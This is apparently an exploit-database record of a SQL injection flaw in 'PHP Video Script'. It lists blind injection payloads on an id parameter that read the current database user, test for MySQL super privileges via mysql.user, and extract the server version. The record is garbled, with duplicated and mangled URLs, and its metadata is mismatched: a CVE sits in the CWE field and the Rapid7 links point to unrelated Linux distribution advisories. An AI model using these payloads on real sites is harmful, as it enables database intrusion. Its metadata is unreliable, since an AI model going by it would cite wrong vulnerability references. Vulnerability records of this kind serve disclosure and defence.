vendor:
PHP Video Script
by:
longrifle0x
9.3
CVSS
HIGH
SQL Injection
89
CWE
Product Name: PHP Video Script
Affected Version From: 1
Affected Version To: 1
Patch Exists: YES
Related CWE: CVE-2011-2511
CPE: a:alurian:php_video_script
Metasploit:
https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2011-1090/, https://www.rapid7.com/db/vulnerabilities/suse-cve-2011-2511/, https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2011-1019/, https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2011-1197/, https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2011-2511/, https://www.rapid7.com/db/vulnerabilities/centos_linux-cve-2011-2511/
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux, Mac
2011
php video script SQL Injection Vulnerability
Discovered a vulnerability in video_tags, vulnerability is SQL injection. link: http://localhost:80/tag <http://localhost/tag> vulnerability link: http://localhost:80/tag <http://localhost/tag>' http://localhost:80/tag'/index.php?id=1 <http://localhost/tag'/index.php?id=1> [GET][id=-1][CURRENT_USER() http://localhost:80/tag'/index.php?id=1[GET][id=-1][SELECT(CASE <http://localhost/tag'/index.php?id=1[GET][id=-1][SELECT(CASE> WHEN ((SELECT super_priv FROMmysql.user WHERE user='None' LIMIT 0,1)='Y') THEN 1 ELSE 0 END) http://localhost:80/tag'/index.php?id=1[GET][id=-1][MID((VERSION()),1,6) <http://localhost/tag'/index.php?id=1[GET][id=-1][MID((VERSION()),1,6)>
Mitigation:
Update to the latest version of the software, Use parameterized queries, Use an input validation library